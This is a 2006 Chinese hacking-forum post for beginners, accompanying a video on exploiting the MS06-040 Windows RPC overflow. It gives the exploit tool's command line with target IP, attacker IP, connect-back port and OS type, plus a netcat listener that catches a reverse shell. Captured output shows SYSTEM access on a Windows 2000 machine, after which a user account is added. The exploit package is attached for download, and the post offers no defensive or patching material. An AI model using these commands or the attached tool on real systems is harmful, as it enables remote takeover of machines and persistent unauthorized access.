[原创]MS06040漏洞利用动画(mika的那个溢出程序)

fhod

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 906
精华: 16
积分: 7085
阅读权限: 150
性别: 男
在线时间: 537 小时
注册时间: 2004-12-6
最后登录: 2008-10-27

发短消息
加为好友
当前离线

楼主大中小发表于 2006-8-24 16:44 只看该作者

[原创]MS06040漏洞利用动画(mika的那个溢出程序)

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
文章作者：fhod

首先我们在内网扫描开放了445端口的机器.
扫描这里我用superscan..

扫描这个网段所有开放了445的机器

172.28.51.1

之前我已经扫到过一个存在漏洞的机子了.
172.28.51.28就是这一个

ms06040rpc 172.28.51.28 172.28.51.223 1234 1

172.28.51.28是存在漏洞的主机.  172.28.51.223是我本机  1234是溢出反弹的端口 1为操作系统类型

<os type(1/2)>:
         1: win 2000sp4 2:win xpsp1

我们另开一个窗口
nc -l -v -p 1234

监听1234端口

然后来到另一个CMD

C:\>nc -l -v -p 1234
listening on [any] 1234 ...
connect to [172.28.51.223] from POSTRATOR [172.28.51.28] 1474
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

看到这个就说明成功了..我们来看下权限

用户添加成功..系统权限..

完毕!!!!

后来我在测试的漏洞机netstat -an发现端口连接的是139..看下

172.28.51.28:139    172.28.51.223:1160 ESTABLISHED

139...我想扫描开放139端口也是可以溢出的..可以试一下..

bye~~~~~

MY BLOG:

http://www.ciker.org/

附件

ms06040利用.rar (2.26 MB): 2006-8-24 16:44, 下载次数: 2654

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 实用技术基础{ Beginners Home } » 动画教程[ Videos for Beginners ] » [原创]MS06040漏洞利用动画(mika的那个溢出程序)